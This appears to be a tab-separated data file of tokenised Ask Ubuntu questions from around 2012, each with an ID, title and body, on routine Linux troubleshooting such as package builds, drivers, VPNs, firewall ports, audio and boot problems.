229055	image magic make fails - php extension	so i was doing the following : sudo apt-get install php-pear php5-dev sudo apt-get install imagemagick libmagickwand-dev sudo pecl install imagick it all works till i get the error : make : *** [ imagick_class.lo ] error 1 error : `make ' failed which according to blog posts and forms is because of libmagick9-dev , how ever when trying to install this i get : sudo apt-get install libmagick9-dev reading package lists ... done building dependency tree reading state information ... done package libmagick9-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : graphicsmagick-libmagick-dev-compat e : package 'libmagick9-dev ' has no installation candidate thoughts ?
229060	library search paths	this question originally started in an apparent problem in cups calling various back-ends and using non-standard library search paths . if i want to change a library search path for a app running in a terminal i can use ld_library_path , rpath , etc. , but if i want to change a library path for a cups back end , i subsequently resolved the cups issue , but i do n't see any mechanism to change the search path whare an app is not running in terminal . for example cups calls backenda and backendb to print on 2 printers , backenda uses libxxx.1.15 and backendb needs libxxx.1.05 , is there any way to change the library search path for backendb ( only ) without recompiling backendb , ( i may not have the source ) ? any ideas ?
229061	will software in ubuntu work in xubuntu as well ?	i 've just recently installed xubuntu 12.04 on my 10 year laptop and on my acer aspire one netbook and i 'm wondering if the software that i run in ubuntu 12.04 will also work in xubuntu . i would think that it would work because they 're very similar but i want to be sure about this .
229062	does kaspersky antivirus 2012 work on ubuntu 12.10 ?	i 'm new to linux and i have installed ubuntu 12.10 on my laptop , i just wanted to know if it is possible to install kaspersky on ubuntu . i know that we can install .exe files in ubuntu with wine . can i use wine to install kaspersky antivirus 2012 ?
229068	cli keyboard shortcuts/ commands not working for non-root users	when i switch user from root to someone else , i 'm unable to use keyboard shortcuts , like tab for completing file and directory names , or the up arrow for previously used commands . how can i enable them for non-root users ?
229070	how do i check the up time in ubuntu 12.10 ?	well sometimes for testing purposes i want to know the up time but do n't know where to look . how do i check for this ?
229073	how do i find similar commands in terminal ?	i know about the `` clear '' command but i accidentally typed `` cls '' instead . i then received a message that said . no command 'cls ' found , but there are 18 similar ones so what is the significance of telling me there are 18 similar commands and is there a way to see the commands that terminal mentioned ?
229075	very poor images quality in chromium	i have ubuntu 12.04 and the images rendering in chromium browser are very very poor . here is a screenshot : i 've tried also in firefox and it seems to be better than chromium but still weak . i have a lenovo b570e model . any suggestions ? thank you !
229076	running a webcam with built-in mic in skype - ubuntu 12.04 ?	i 'm running ubuntu 12.04 , while using skype it will happily pickup my webcam feed , but ca n't seem to get the mic working . in skype 's audio settings i only get one option , which is `` pulse audio '' seems to be no option for it to use the web cams built in mic . any ideas how i can get it to work ? the webcam is a logitech hd webcam c510 . thanks in advance . also , in my pulse audio settings the webcam mic is shown there and seems to be working fine . just not through skype .
229079	ca n't bookmark specific network locations in nautilus	i am using a nas server to keep all my music , pictures and video on , and would like to have them as easily accessible in nautilus as possible . so naturally , i edited the 'music ' , 'video ' and 'pictures ' links on the left on nautilus under 'computer ' to my custom locations on the network . this worked fine until i restarted ubuntu , when i noticed all the links had disappeared . i assume this is because the locations are n't local , and do n't fit the 'computer ' criteria . so i tried adding them via ctrl+d ( add bookmark ) , and all this did was create a link to the root of the network drive under bookmarks , not helpful . so , is there any way i can add links to these folders to the left side of nautilus ? to mount the nas , i edited fstab with the following using cifs //nas ip /home/henry/henrydocs cifs uid=henry , username=henry , password=x 0 0
229081	making network connection `` available to all users '' and `` connect automatically '' has no effect	i 'm the main user of my machine , but i want it to be usable by other members of my family too , without sharing passwords . the problem is there seems to be no ( simple ) way for someone to connect to the network . i configured a vpn connection and made it both connect automatically and available to all users . however , neither settings seems to have any effect : when i login as my own user x , the connection is not up , but at least i can start it manually . when logged in as another user and trying to start the connection , system asks for x password . however , even then it fails to start the connection ( i do n't know where to look for exact error , desktop popup is just generic `` failed '' message ) . i tried to start connection as x , then relogin as a different user . this other user can then stop the connection without any password , but when trying to start again has the same problem as described in the previous paragraph . is this a known problem ? are there any workarounds or just misconfigurations on my part ?
229082	ubuntu 12.10 does not serve bluetooth adapter	on toshiba nb205 i have builtin bt adapter . ubuntu 12.04 and later 12.10 does not see it . is that possible to fix that issue ?
229084	how can i make seamless virtualization work with virtualbox and rdesktop ?	there are lots of tutorials on the web how can this be done . i followed this : https : //help.ubuntu.com/community/seamlessvirtualization but they all are basically agree on what needs to be done . howerver , when i run my virtualmachine in headless mode : vboxheadless -- startvm winxp and try to connect to it with : rdesktop -a -s `` c : \program files\thinlinc\wtstools\seamlessrdpshell.exe notepad.exe '' 192.168.123.103:3389 -u user -p password i only get to connect to full windows desktop , not to one application ( notepad in this case ) . i have no idea what is wrong , i only found someone with the same problem here : http : //ubuntuforums.org/showthread.php ? p=12404643 ( he is on mint , i am on ubuntu 12.10 ) .
229085	nvidia-settings writes xorg.conf but does n't load settings	i made my changes on nvidia-settings and also writed the changes to xorg.conf ( yes , i checked the file ) . after rebooting the settings are only applied after i open nvidia-settings agains , any way i can fix this ? right now i 'm running this bs at startup : timeout 1 nvidia-settings happens with all available drivers ( nouveau , current/experimental ) . the original -- load-config-only that was on startup does n't work .
229091	notify for thunderbird e-mail in dash 12.04	in the past i had the thunderbird icon in the dash show how many e-mails i received . with a new 12.04 install on an other computer , it is shown , but not with mine any more . e-mail # 's are shown with the envelope in the top bar . it also changes colour . running thunderbird 17.0 & compiz . any suggestions ?
229098	how to i stop ubuntu making .trash folder in each device	well title says all . as there is no use of this feature for me i want to disable this feature whenever i delete is stays it stays in .trash folder of a device e.g . pendrive and with time it start to take space in gb 's . how can i disable it .
229102	what is aptitude 's extended state information	i have both apt-get and aptitude installed on my system . when i am performing any operation using aptitude , i see reading extended state information and writing extended state information . these messages are not present with apt-get . what state information is aptitude reading that apt-get is not ?
229103	i made ubuntu thrash my win 8 mbr - can i restore it and my data ?	i have a lovely lenovo g780 that came with win7 which i upgraded to win 8 - i downloaded the ubuntu 12.10.iso and the app that let me set up a boot usb stick . i tried to run ubuntu ( for the first time ) and it showed me options where it said it couldnt see windows 8 - ( 1tb drive split into 2 ) i chose the lva option thinking it would work out about my partition but it seems to have scrubbed everything i stopped the install - so now i have a brick - the recovery button doesnt boot or recover , the ubuntu wont boot - can i get back my windows 8 and the data i had n that partition
229105	error during install ubuntu 12.10 gnome remix and ubuntu 12.10 . ubiquity unable to create a directory	during i install ubuntu 12.10 , normal or gnome remix , the install stop and show me the desktop of the livecd . the error apears is : * ( ubiquity:113375 ) : critical * : unable to create directory '/root/.cache/dconf ' : permission denied . dconf will not work properly .
229106	font size is really small in code : :blocks ide	i pressed ctrl + capslock instead of ctrl+tab 4-5 times . each time the font-size of the editor shrunk . i checked settings - > editor - > font , but the problem was not from font-size , it 's like a `` zoom-out '' thing . i tried sudo apt-get remove codeblocks and sudo apt-get install codeblocks but unfortunately it did n't reset the preferences . what can i do now ?
229116	why is n't the unity launcher shown using nxserver nomachine ?	i am using ubuntu 12.04 and recently installed nxserver , nxclient and nxnode on my office machine and laptop . when i am trying to access my office machine from my laptop , i am able to see all the items on the desktop , however it does not show me the launcher panel . and thus i ca n't do anything . when i open a text file in gedit , there is no `` close , minimize and resize panel '' on the top of text window . i have been trying since this morning but failed miserably . why is n't the launcher visible ?
229118	how to unhide mouse cursor on nexus 7 ?	i am using synergy to control my ubuntu on nexus 7 using my desktop mouse and keyboard . however , the mouse cursor is displayed only if i connect my mouse via usb . what service controls the visibility of the mouse cursor ? how to make it visible manually ?
229119	why is n't my cisco vpn receiving network packets ?	i 'm experiencing a problem since i upgraded to ubuntu 12.10 . i 've 3 cisco vpn profiles ( pcf format , the old ones , not the anyconnect type ) . every of these profiles worked correctly on ubuntu12.04 , with vpnc packages installed , but with a fresh installation of ubuntu12.10 and vpn one of that profiles stopped working . i correctly set up the vpn connection , the secrets are confirmed by the secure gateway , but nothing works . i can not reach any host on that network . with both ifconfig and wireshark i 've seen that i do n't recieve packets , i 've only traffic going out . can anyone help me out to troubleshoot and resolve the problem : ) ? update : the profile that is n't working with ubuntu12.10 works fine with the official cisco vpn client under ms windows .
229122	how to make gnome-shell the default gui in ubuntu-builder ?	i 'm making my own distro with ubuntu builder and i want to make gnome-shell the main gui . i tried many things like removing unity and using gdm and a whole bunch of other things but i keep getting a message `` failed to load session 'ubuntu ' . '' i 'm also using ubuntu 12.04 i also tried this how to install the full gnome desktop as close to upstream as possible ? but only resulted in the same error .
229125	how to check if my graphic card is working proper	after i 've installed ubuntu 12.04 my graphic card driver was n't recognized . to fix this i 've installed `` mesa-utils '' package and my graphic driver now it 's recognized . on browsers ( chrome , firefox ) , i have the impression that the images are a little bit pixelated , but just only in browsers because when i 'm using a image viewer app the images seems to render proper . is there a way to check if my graphic card is the right one and it 's working proper ? thanks ! later edit : i 'm using a lenovo b570e model .
229127	screen starts up with lines running across ?	i just transferred a hp pavilion dv2000 from windows to ubuntu 12.04 . when it starts up there there are lines across the screen and after i log in , the mouse ca n't reach the edge of the screen on the left and if you touch the top of the screen with the cursors , a bar runs top to bottom and stays there as long as it touches the top . if you close and open the screen several times , sometimes it goes away . i found a suggestion in a forum to check the print out of : /usr/lib/nux/unity_support_test -- print it printed this : nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 nvfx_screen_get_param:95 - warning : unknown pipe_cap 55 nvfx_screen_get_param:95 - warning : unknown pipe_cap 56 nvfx_screen_get_param:95 - warning : unknown pipe_cap 59 nvfx_screen_get_param:95 - warning : unknown pipe_cap 58 nvfx_screen_get_param:95 - warning : unknown pipe_cap 30 opengl vendor string : nouveau opengl renderer string : gallium 0.4 on nv67 opengl version string : 2.1 mesa 8.0.4 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
229128	toshiba satellite l745-s4110 brightness keys not working	my brightness keys do n't work on ubuntu 12.10 . it 's weird because they only worked 1 time , and i was like `` i guess it fixed itself , '' but it has n't worked since then.. i get this from in syslog : dec 14 16:14:08 toshi kernel : [ 2315.861338 ] atkbd serio0 : unknown key pressed ( translated set 2 , code 0xee on isa0060/serio0 ) . dec 14 16:14:08 toshi kernel : [ 2315.861342 ] atkbd serio0 : use 'setkeycodes e06e < keycode > ' to make it known . dec 14 16:14:08 toshi kernel : [ 2315.934813 ] atkbd serio0 : unknown key released ( translated set 2 , code 0xee on isa0060/serio0 ) . dec 14 16:14:08 toshi kernel : [ 2315.934817 ] atkbd serio0 : use 'setkeycodes e06e < keycode > ' to make it known . dec 14 16:14:08 toshi kernel : [ 2316.097483 ] atkbd serio0 : unknown key released ( translated set 2 , code 0x55 on isa0060/serio0 ) . dec 14 16:14:08 toshi kernel : [ 2316.097493 ] atkbd serio0 : use 'setkeycodes 55 < keycode > ' to make it known . also it works to change brightness in brightness and lock but it 's very inconvenient to have to use that .
229129	python global hotkey	i 'm looking to create a global hotkey in python 3.2 for ubuntu 12.10 . that is , my script will run in the background and whenever i press shift+f4 ( for example ) , no matter what the active window is , the script will do something . some resources i have looked at : http : //code.google.com/p/python-globalhotkeys/ http : //projects.gnome.org/deskbar-applet/ ( source ) http : //sourceforge.net/apps/mediawiki/pyhook/ ( for windows ) http : //python-xlib.sourceforge.net/ http : //sourceforge.net/apps/mediawiki/pykeylogger/ maybe i am too much of a newb ( i am a beginner ) or i have been looking in the wrong places or for the wrong things , but , i have n't been able to utilize the resources above . how can i create a global hotkey with python 3.2 in ubuntu 12.10 . thanks !
229130	upgrade from ubuntu 12.04 to 12.10 failed , now loads `` grub rescue ''	i attempted to upgrade from 12.04 to 12.10 last night . installation seemed to go fine , and this morning i had a message like `` restart now to complete installation '' . so i restart , get an initial `` loading operating system ... '' message , followed by `` error : file not found . then it kicks into `` grub rescue > '' mode . previously i have this running as a dual boot ( window 7 ) and i just ran the upgrade to 12.10 via the update manager in ubuntu . any ideas on what is going on here , or what the error means ? i know my way around the command line , but this is above my pay grade . thanks for any advice .
229142	xubuntu mail watcher ( xfce plugin ) wo n't connect to imap	i am trying to get the xfce mail watcher panel plugin to check my imap mail , but it wo n't connect to my server . i have entered the details correctly -- they 're exactly the same as those i use in thunderbird -- but nothing ! when i go to select the `` new mail folders ... '' it returns with `` failed to get folder list '' . if i change my username from name @ domain to name , i still get this error , but it takes a few seconds longer to appear . nothing shows up in the log . if it makes a difference , my mail is hosted by microsoft , in some way . like i say , i can access it through thurderbird using the imap credentials ; but i have the exchange 2010 web app , if i use webmail . could this be the problem ? ( thunderbird often complains with `` command error . 12 '' with what it gets back from the server , but carries on regardless . )
229149	sizes of application windows are not remembered each time the app is launched	kubuntu 12.04 standard install , kernel is 3.2.0-34-generic . i launch an application ( specific application is irrelevant as this issue occurs with all of them ) . i maximize the window , or move it to a specific location on the screen . i close the application . the next time i launch the app , the window is back at its original size and location . if any further information is required .
229154	how to change port 27000 from filtered to open status	in my ubuntu box i am running flexlm licensing software on port 27000 and i am able to pull the license from the this port to run the simulation software locally . i am also trying to run the same software in another linux machine ( opensuse ) by using the flexlm license from the ubuntu box . however , my opensuse box is unable to communicate with port 27000 in my ubuntu box . i have turned off the firewall on the ubuntu box , played around with iptables and when i do a nmap from my opensuse box to ubuntu box the message i get is that port 27000 is on filtered status . my understanding is that filtered status does not allow the opensuse box to communicate with ubuntu . my question is how to change port 27000 from filtered status to open status ? hope someone can help me out . thank you . andy here is the iptables and i am using ufw cranjan @ ubuntu : ~ $ sudo iptables -l [ sudo ] password for cranjan : chain input ( policy drop ) target prot opt source destination fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh accept all -- anywhere anywhere in_home all -- anywhere anywhere in_windows all -- anywhere anywhere accept all -- anywhere anywhere state related log all -- anywhere anywhere limit : avg 1/sec burst 5 log level warning prefix `'in-unknown : '' drop all -- anywhere anywhere chain forward ( policy drop ) target prot opt source destination accept all -- anywhere anywhere state related log all -- anywhere anywhere limit : avg 1/sec burst 5 log level warning prefix `'pass-unknown : '' drop all -- anywhere anywhere chain output ( policy drop ) target prot opt source destination accept all -- anywhere anywhere out_home all -- anywhere anywhere out_windows all -- anywhere anywhere accept all -- anywhere anywhere state related log all -- anywhere anywhere limit : avg 1/sec burst 5 log level warning prefix `'out-unknown : '' drop all -- anywhere anywhere chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain in_home ( 1 references ) target prot opt source destination in_home_all_c1 all -- anywhere anywhere in_home_irc_c2 all -- anywhere anywhere in_home_ftp_c3 all -- anywhere anywhere in_home_ssh_s4 all -- anywhere anywhere in_home_ping_s5 all -- anywhere anywhere in_home_samba_s6 all -- anywhere anywhere in_home_samba_c7 all -- anywhere anywhere accept all -- anywhere anywhere state related log all -- anywhere anywhere limit : avg 1/sec burst 5 log level warning prefix ` '' in-home ' : '' drop all -- anywhere anywhere chain in_home_all_c1 ( 1 references ) target prot opt source destination accept all -- anywhere anywhere state established chain in_home_ftp_c3 ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp spt : ftp dpts:32768:61000 state established accept tcp -- anywhere anywhere tcp spt : ftp-data dpts:32768:61000 state related , established accept tcp -- anywhere anywhere tcp spts:1024:65535 dpts:32768:61000 state established chain in_home_irc_c2 ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp spt : ircd dpts:32768:61000 state established chain in_home_ping_s5 ( 1 references ) target prot opt source destination accept icmp -- anywhere anywhere state new , established icmp echo-request chain in_home_samba_c7 ( 1 references ) target prot opt source destination accept udp -- anywhere anywhere udp spt : netbios-ns dpt : netbios-ns state established accept udp -- anywhere anywhere udp spt : netbios-ns dpts:32768:61000 state established accept udp -- anywhere anywhere udp spt : netbios-dgm dpt : netbios-dgm state established accept udp -- anywhere anywhere udp spt : netbios-dgm dpts:32768:61000 state established accept tcp -- anywhere anywhere tcp spt : netbios-ssn dpts:32768:61000 state established accept tcp -- anywhere anywhere tcp spt : microsoft-ds dpts:32768:61000 state established chain in_home_samba_s6 ( 1 references ) target prot opt source destination accept udp -- anywhere anywhere udp spt : netbios-ns dpt : netbios-ns state new , established accept udp -- anywhere anywhere udp spts:1024:65535 dpt : netbios-ns state new , established accept udp -- anywhere anywhere udp spt : netbios-dgm dpt : netbios-dgm state new , established accept udp -- anywhere anywhere udp spts:1024:65535 dpt : netbios-dgm state new , established accept tcp -- anywhere anywhere tcp spts:1024:65535 dpt : netbios-ssn state new , established accept tcp -- anywhere anywhere tcp spts:1024:65535 dpt : microsoft-ds state new , established chain in_home_ssh_s4 ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp spts:1024:65535 dpt : ssh state new , established chain in_windows ( 1 references ) target prot opt source destination in_windows_smtp_s1 all -- anywhere anywhere in_windows_http_s2 all -- anywhere anywhere in_windows_ftp_s3 all -- anywhere anywhere in_windows_dns_s4 all -- anywhere anywhere in_windows_squid_s5 all -- anywhere anywhere in_windows_dhcp_s6 all -- anywhere anywhere in_windows_http_s7 all -- anywhere anywhere in_windows_icmp_s8 all -- anywhere anywhere in_windows_icmp_c9 all -- anywhere anywhere accept all -- anywhere anywhere state related log all -- anywhere anywhere limit : avg 1/sec burst 5 log level warning prefix ` '' in-windows ' : '' drop all -- anywhere anywhere chain in_windows_dhcp_s6 ( 1 references ) target prot opt source destination accept udp -- anywhere anywhere udp spt : bootpc dpt : bootps chain in_windows_dns_s4 ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp spt:3128 dpts:1024:65535 state established netstat-anigrep cranjan @ ubuntu : ~ $ netstat -an|grep list tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen tcp 0 0 0.0.0.0:49493 0.0.0.0 : * listen tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen tcp 0 0 0.0.0.0:27000 0.0.0.0 : * listen tcp6 0 0 : ::22 : : : * listen tcp6 0 0 : :1:631 : : : * listen unix 2 [ acc ] stream listening 10192 /tmp/orbit-cranjan/linc-849-0-5cf869d15b3ec unix 2 [ acc ] stream listening 8754 @ /tmp/dbus-oezitogft8 unix 2 [ acc ] stream listening 10203 /tmp/orbit-cranjan/linc-848-0-32221e795bc88 unix 2 [ acc ] stream listening 10635 /tmp/orbit-cranjan/linc-855-0-43c3de6d81f95 unix 2 [ acc ] stream listening 10657 /tmp/orbit-cranjan/linc-853-0-217a10f785bd6 unix 2 [ acc ] stream listening 10663 /tmp/orbit-cranjan/linc-859-0-e63817d85cf2 unix 2 [ acc ] stream listening 10752 /tmp/orbit-cranjan/linc-860-0-275125c19a706 unix 2 [ acc ] stream listening 10760 /tmp/orbit-cranjan/linc-857-0-1b7175879ac02 unix 2 [ acc ] stream listening 10779 /tmp/orbit-cranjan/linc-85a-0-4dd32e9c9daed unix 2 [ acc ] stream listening 10901 /tmp/orbit-cranjan/linc-864-0-66e40c5eb66ae unix 2 [ acc ] stream listening 11414 /tmp/orbit-cranjan/linc-86c-0-5afc43ec99b12 unix 2 [ acc ] stream listening 11652 /tmp/orbit-cranjan/linc-86f-0-6909ae8e71c13 unix 2 [ acc ] stream listening 28839 /tmp/orbit-cranjan/linc-8ce-0-67cf32c7a4000 unix 2 [ acc ] stream listening 146671 /tmp/orbit-cranjan/linc-940-0-1cca5987ea42 unix 2 [ acc ] stream listening 4645 /var/run/acpid.socket unix 2 [ acc ] stream listening 7005 @ /var/run/hald/dbus-9rwzehuxzv unix 2 [ acc ] stream listening 2665 @ /com/ubuntu/upstart unix 2 [ acc ] stream listening 4157 /var/run/dbus/system_bus_socket unix 2 [ acc ] stream listening 4883 @ /tmp/.x11-unix/x0 unix 2 [ acc ] stream listening 5741 /var/run/cups/cups.sock unix 2 [ acc ] stream listening 7036 /var/run/fail2ban/fail2ban.sock unix 2 [ acc ] stream listening 8741 /tmp/ssh-awxvql2002/agent.2002 unix 2 [ acc ] stream listening 5281 @ /tmp/gdm-greeter-ehaatcyd unix 2 [ acc ] stream listening 8782 @ /tmp/.ice-unix/2002 unix 2 [ acc ] stream listening 4283 /var/run/avahi-daemon/socket unix 2 [ acc ] stream listening 8783 /tmp/.ice-unix/2002 unix 2 [ acc ] stream listening 4884 /tmp/.x11-unix/x0 unix 2 [ acc ] stream listening 8803 /tmp/orbit-cranjan/linc-7fb-0-394d0c2c7bba5 unix 2 [ acc ] stream listening 9022 /tmp/orbit-cranjan/linc-7d2-0-749e269d7e12a unix 2 [ acc ] stream listening 9152 /tmp/keyring-27blif/ssh unix 2 [ acc ] stream listening 20196 /tmp/orbit-cranjan/linc-89e-0-7a28b4d49ee3d unix 2 [ acc ] stream listening 20261 /tmp/orbit-cranjan/linc-8a4-0-5c25fd95ab7d8 unix 2 [ acc ] stream listening 20349 /tmp/orbit-cranjan/linc-8a8-0-7a28b4d4b67cd unix 2 [ acc ] stream listening 5458 @ /tmp/gdm-session-vyglkeyd unix 2 [ acc ] stream listening 8495 /tmp/keyring-27blif/control unix 2 [ acc ] stream listening 9154 /tmp/keyring-27blif/pkcs11 unix 2 [ acc ] stream listening 9171 /tmp/orbit-cranjan/linc-802-0-6eb9d50bd0fdc unix 2 [ acc ] stream listening 9957 /tmp/orbit-cranjan/linc-816-0-2ed05eef44122 unix 2 [ acc ] stream listening 9664 /tmp/orbit-cranjan/linc-811-0-7c48fbd4f30bc unix 2 [ acc ] stream listening 9666 /tmp/orbit-cranjan/linc-80f-0-655b9438f3104 unix 2 [ acc ] stream listening 9668 /tmp/orbit-cranjan/linc-815-0-3100350bf3161 unix 2 [ acc ] stream listening 9682 /tmp/orbit-cranjan/linc-814-0-399a7b5bf360b unix 2 [ acc ] stream listening 9688 /tmp/orbit-cranjan/linc-818-0-14a559eef3944 unix 2 [ acc ] stream listening 9829 /tmp/.esd-1000/socket unix 2 [ acc ] stream listening 9832 /home/cranjan/.pulse/77caea2cdb600d3427a2a8684c86c409-runtime/native unix 2 [ acc ] stream listening 9928 /tmp/orbit-cranjan/linc-834-0-4a80ef294001d unix 2 [ acc ] stream listening 7000 @ /var/run/hald/dbus-xhxwqelk6k unix 2 [ acc ] stream listening 10073 /tmp/orbit-cranjan/linc-83c-0-4d7ce2a153a11 cranjan @ ubuntu : ~ $ thanks for your help .
229160	linux kernel : page substitution policy	i am supposed to answer for homework which algorithm is implemented in linux for the virtual memory page substitution and also give some extracts of the code to prove that . after some research i have found that the following functions are called when a page fault occurs : do_page_fault |handle_mm_fault |pte_alloc |pte_alloc_one |__get_free_page = __get_free_pages |alloc_pages |alloc_pages_pgdat |__alloc_pages |wakeup_kswapd but i tried to follow this sequence and at some point i got totally lost . is there any reasonable extract of code that could prove my point ?
229164	is it ok to have 2 screen recorders running at the same time ?	ok i always have issues recording my desktop with kazam or gtk-recordmydesktop so now i 'm very paranoid so is it ok to have ffmpeg running with kazam at the same time ? will there be conflicts ? thanks
229165	virtualbox install	i am using win 7 ultimate . i have the current version of virtualbox . i downloaded ubuntu 12.10 from the ubuntu website and the install as disc image . ubuntu probably goes thru about 75 % of the install and then i get an error message saying that there is a hardware issue and can not continue . the error message also says it can not read the disc , etc , etc . i have downloaded 2 different versions of ubuntu . i had downloaded and re-installed virtualbox twice . i also tried 12.04 but came into the same issue . i downloaded the `` desktop amd-64 '' thank you in advance for your help .
229167	keyboard layout table â how to force update ?	after creating a custom keyboard layout , a table picturing the layout in a nice graphical representation was automatically created . it can be accessed from the keyboard icon . it opens in a separate window , cf . below : however , this table is n't updated after making changes to an already existing layout ( even not after rebooting ) . this is annoying , since now the picture does n't correspond to the actual keyboard layout , but rather to the original one , before making any changes . it is just never updated after a keyboard layout is created with a new name . removing the keyboard layout from /usr/share/x11/xkb/symbols/ and creating it again does n't help ; the table seems to be cached somewhere . i have no idea where this picture ( or whatever it be ) is saved , i do n't even know what program creates it ( it does n't look too much like the ps-files created by xkbprint ) . maybe deleting the table ( not the keyboard layout ) would do the job , but since i do n't know where it is , i could n't try . i 'd appreciate any hint on how i can force this table to be updated , so to fit my modified keyboard layout . ( i 'm using precise with unity . )
229169	install libreoffice sdk in 12.10	how can i install the libreoffice sdk in ubuntu 12.10 ? is it available in the repositories already or do i have to manually install it , if so how and what prerequisites are needed to install it as i have a fresh ubuntu install .
229171	custom keyboard shortcuts are reset . how can i make them set permanently ?	i 'm having a problem with both ubuntu 12.04 and 12.10 with custom keyboard shorcuts . they are reset after a while ( i ca n't find a pattern but it seems to be when a massive upgrade happens ) . it happend to me a couple of days ago , when 12.10 got about 27 updates . i 've searched launchapd and askubuntu , and found no question similar . my shortucts are not lost on reboot , i still ca n't find a pattern to identify the problem as i said . i tried also not using control center app , but gnome 's dconf-editor , but same result as i found on some blog post . my question is , how can i save my custom shorcuts to restore them when this happens ? can somebody help me compose a bug for launchpad , like what package could be causing this , so i can fill a bug report . thanks in advance .
229174	how can i make seamonkey the default web and e-mail client in precise ?	i 've installed seamonkey 2.14.1 via ubuntuzilla , but i ca n't seem to figure out how to make it the default mail and web clients . if i click on a web link in the seamonkey news or mail reader it launches the link in seamonkey as i 'd expect . however , if i click on a link outside of seamonkey , it 'll launch google chrome ( which somehow made itself my default browser ) . can anyone help ? i do n't like firefox/thunderbird ... i uninstalled both immediately after installing ubuntu . thanks in advance .
229176	is there ever going to be something like xampp	xampp in windows is a snap . trying to lamp working in linux mint is a real pain . yes , i have tried most of the solutions such as creating a virtual machine , vagrant , installing apache , mysql , php , etc . even something called moodle ( if memory serves ) . i can get as far as opening a web browser and typing localhost which opens page that says it works and it is all uphill beyond that point .
229181	ubuntu in vmware : vt-x not supported ?	when i open ubuntu vms , ( including other ones ) ialways get this if i enable vt-x . virtualized intel vt-x/ept is not supported on this platform . continue without virtualized intel vt-x/ept ? yeah , i am very confused about that . any fixes ? thanks ( sorry for bad english , i am indonesian )
229189	how to install the latest version of google earth on ubuntu 12.10 64-bit ?	chris here with a huge problem with the google earth latest version . gosh.. whenever i try to lunch the app this comes out . i'v tried this web site nothing worked : ( thank you so much for even reading this . may you guys have a nice day . christopher @ christopher-e4300 : ~ $ google-earth google earth has caught signal 11 . we apologize for the inconvenience , but google earth has crashed . this is a bug in the program , and should never happen under normal circumstances . a bug report and debugging data have been written to this text file : /home/christopher/.googleearth/crashlogs/crashlog-50cbd67e.txt please include this file if you submit a bug report to google . https : //help.ubuntu.com/community/googleearth # installing_the_.deb_file_downloaded_from_the_google_earth_website here is the content of /home/christopher/.googleearth/crashlogs/crashlog-50cbd67e.txt major version 7 minor version 0 build number 0001 build date oct 29 2012 build time 19:13:39 os type 3 os major version 3 os minor version 5 os build version 0 os patch version 0 crash signal 11 crash time 1355535998 up time 0.789556 stacktrace from glibc : ./libgoogleearth_free.so ( +0x1e9cfb ) [ 0xf757dcfb ] ./libgoogleearth_free.so ( +0x1e9f43 ) [ 0xf757df43 ] [ 0xf7726400 ]
229194	no audio devices in pulseaudio after upgrading to 12.10	i upgraded from ubuntu 12.04 to 12.10 and after this i have no audio devices in the audio settings panel , but other parts of the system indicate that i do still have audio devices . eg : aplay -l returns **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 what can i do to debug this further ? all the links i 've found such as https : //wiki.ubuntu.com/debuggingsoundproblems do n't resolve my problem . for example alsamixer thinks there is no problem and happily lets me change volumes and mute/unmute . thanks ! update : a clue : i was wondering if it had anything to do with the fact i have two sound devices , one from my discrete gpu for hdmi and one from intel . it turns out this is the culprit ! if i switch to my discrete gpu ( using vga_switcheroo ) audio works again through the speakers . it 's good to know , but i do n't use my discrete gpu often because the increased heat/power to do absolutely nothing is pointless for me under linux : / .
229195	wireless driver - how to load manufacturer 's sta file ( ralink 3290 )	caution : i 'm a newb . hardware : giada i35g , cedar trail atom with nvidia gf119 , railtek ethernet and ralink 3290 for wireless . already accomplished : installed ubuntu 12.10 , loaded gpu drivers and redirected sound out through gpu card to hdmi . ethernet works like a charm . issue : ca n't get my wireless up and running . there seems to be no package to which i can simply run a sudo apt-get install . i found the corresponding linux driver from the manufacturer 's site , but i have not managed to find out what to with the file . here 's the manufacturers site . i get a file with the following name : \2012_0508_rt3290_linux_sta_v2.6.0.0.bz2 i hope somebody might be able to tell me what to do next . thanks for reading and apologies for potentially asking a trivial question . best regards , matt
229196	ca n't boot kernel error -cpu features	when i try to use ubuntu on my pc ( windows ) , i get the following error : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for you cpu . i do n't know what this mean , i 'm not really good at computers . i am using a tmb thinkpad . anyone see this error before or does anyone know what it means ?
229199	how to retrieve deleted printers	so 2 of my network printers have been accidentally deleted . i 've tried to re-add the printers , but ubuntu would n't find them . i can only print via usb now . how can i re-add those printers wirelessly ?
229200	where does alacarte store the file with the edited menus ?	i 'm trying to import some settings unto a new machine , i 've edit the menus and removed some categories and removed some entries but i do n't know where does alacarte stores the file which contains all of that information . how can i find this file ( if it exists ) ? or how can i import my custom menu settings ?
229202	after installing ubuntu 12.04 my internet connection has completely disappeared	on my pc after installing ubuntu 12.04 my networks are completely gone . inside the terminal , after typing in nm-tool i get the following : the program nm-tool is currently not installed . you can install by typing : sudo apt-get install network-manager after i type that in then my password i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : network manager : depends : iputils-arping but it is not going to be installed e : unable to correct problems , you have held broken packages i 'm a complete novice when it comes to computers so i have no clue .
